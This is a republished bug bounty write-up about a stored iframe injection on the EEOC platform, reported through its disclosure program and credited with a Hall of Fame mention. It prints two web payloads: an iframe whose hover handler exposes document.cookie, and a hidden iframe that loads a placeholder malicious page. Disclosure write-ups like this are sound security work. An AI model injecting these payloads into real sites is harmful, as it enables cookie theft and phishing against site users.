Iframe Injection Vulnerability Found in EEOC — Hall of Fame Entry
作者在EEOC平台上发现并报告了一个Iframe注入漏洞,成功获得名人堂荣誉。该漏洞允许攻击者注入恶意HTML内容以窃取cookies或进行钓鱼攻击。作者通过测试输入字段并注入payload验证了漏洞,并强调了此类安全问题的重要性。 2025-7-26 07:9:3 Author: infosecwriteups.com(查看原文) 阅读量:15 收藏

Sidhartha

Hello folks this is my 2nd Medium Write up👋,

Zoom image will be displayed

I’m excited to share another milestone in my bug bounty journey — recently I reported an Iframe Injection vulnerability in the Equal Employment Opportunity Commission (EEOC) platform under their Vulnerability Disclosure Program, and was honored with a Hall of Fame mention!

In this post, I’ll walk through the bug, its impact, and how I discovered and responsibly disclosed it.

An iframe injection occurs when an attacker is able to inject malicious HTML content into a web page, often using the <iframe> tag. This is somewhat related to XSS (Cross-Site Scripting) but specifically abuses iframes to embed malicious pages or trigger JavaScript events.

Attackers can use this to:

  • Steal cookies
  • Redirect users to phishing sites

. Load malicious third-party scripts

  • Create fake login screens within legitimate websites

Here’s how I found the bug:

  1. Navigate to the URL
    https://example.com (actual target redacted for responsible disclosure)
    Log in with a test account.
  2. Locate an input field where user-generated content is rendered on the front end.
  3. Inject the Payload
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<iframe src=”http://malicious/web.html” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

Click Save or Submit
The payload was successfully stored and reflected on the page.

  1. Trigger the Payload
    When hovering over the iframe, it executed the JavaScript and popped up the cookie alert.

This vulnerability can be used to:

  • Steal session cookies or tokens
  • Impersonate users or admins
  • Launch phishing or clickjacking attacks
  • Embed malicious websites that look like the original
  • Harm user trust and compromise security

Even though this looks similar to XSS, the exploitation vector is specifically tied to iframe behavior, which can bypass some content filters if not properly handled.

📚 Related References

For those who want to learn more about iframe injection, here are some great articles I recommend:

Join our Telegram Channel More Updates -> https://t.me/anon_courses

This report was acknowledged and added to the Hall of Fame by EEOC, and I’m happy to contribute to making government platforms more secure. 🛡️

If you’re into bug bounty or ethical hacking, never underestimate lesser-known vectors like iframe injection. Always test every input thoroughly and think creatively — that’s often where the bugs hide.

Stay curious, stay ethical. 🔍💻

Zoom image will be displayed

HOF

文章来源: https://infosecwriteups.com/iframe-injection-vulnerability-found-in-eeoc-hall-of-fame-entry-0e8a4c2059d0?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh